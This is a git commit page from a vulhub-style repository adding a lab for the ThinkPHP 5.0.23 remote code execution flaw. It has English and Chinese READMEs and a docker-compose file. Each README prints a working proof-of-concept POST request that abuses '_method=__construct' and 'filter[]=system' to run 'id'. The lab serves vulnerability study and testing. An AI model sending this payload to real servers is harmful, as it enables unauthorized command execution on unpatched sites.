aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
thinkphp/5.0.23-rce/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 75 KiB

39
thinkphp/5.0.23-rce/README.md Normal file
View File

@@ -0,0 +1,39 @@
# ThinkPHP5 5.0.23 Remote Code Execution Vulnerability
[中文版本(Chinese version)](README.zh-cn.md)
ThinkPHP is an extremely widely used PHP development framework in China. In its version 5.0(<5.0.24), while obtaining the request method, the framework processes it incorrectly, which allows an attacker to call any method of the Request class, resulting in a RCE vulnerability through a specific exploit chain.
References
- https://github.com/top-think/framework/commit/4a4b5e64fa4c46f851b4004005bff5f3196de003
## Environment Setup
Enter the following command(ThinkPHP version: 5.0.23)
```
docker compose up -d
```
Visit `http://your-ip:8080` and you'll see the default page of ThinkPHP.
## POC
Send the packets and execute the command `id`:
```
POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
```
![](1.png)

39
thinkphp/5.0.23-rce/README.zh-cn.md Normal file
View File

@@ -0,0 +1,39 @@
# ThinkPHP5 5.0.23 远程代码执行漏洞
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中获取method的方法中没有正确处理方法名导致攻击者可以调用Request类任意方法并构造利用链从而导致远程代码执行漏洞。
参考链接:
- https://github.com/top-think/framework/commit/4a4b5e64fa4c46f851b4004005bff5f3196de003
## 漏洞环境
执行如下命令启动一个默认的thinkphp 5.0.23环境:
```
docker compose up -d
```
环境启动后,访问`http://your-ip:8080`即可看到默认的ThinkPHP启动页面。
## 漏洞复现
发送数据包:
```
POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
```
成功执行`id`命令:
![](1.png)

5
thinkphp/5.0.23-rce/docker-compose.yml Normal file
View File

@@ -0,0 +1,5 @@
services:
web:
image: vulhub/thinkphp:5.0.23
ports:
- "8080:80"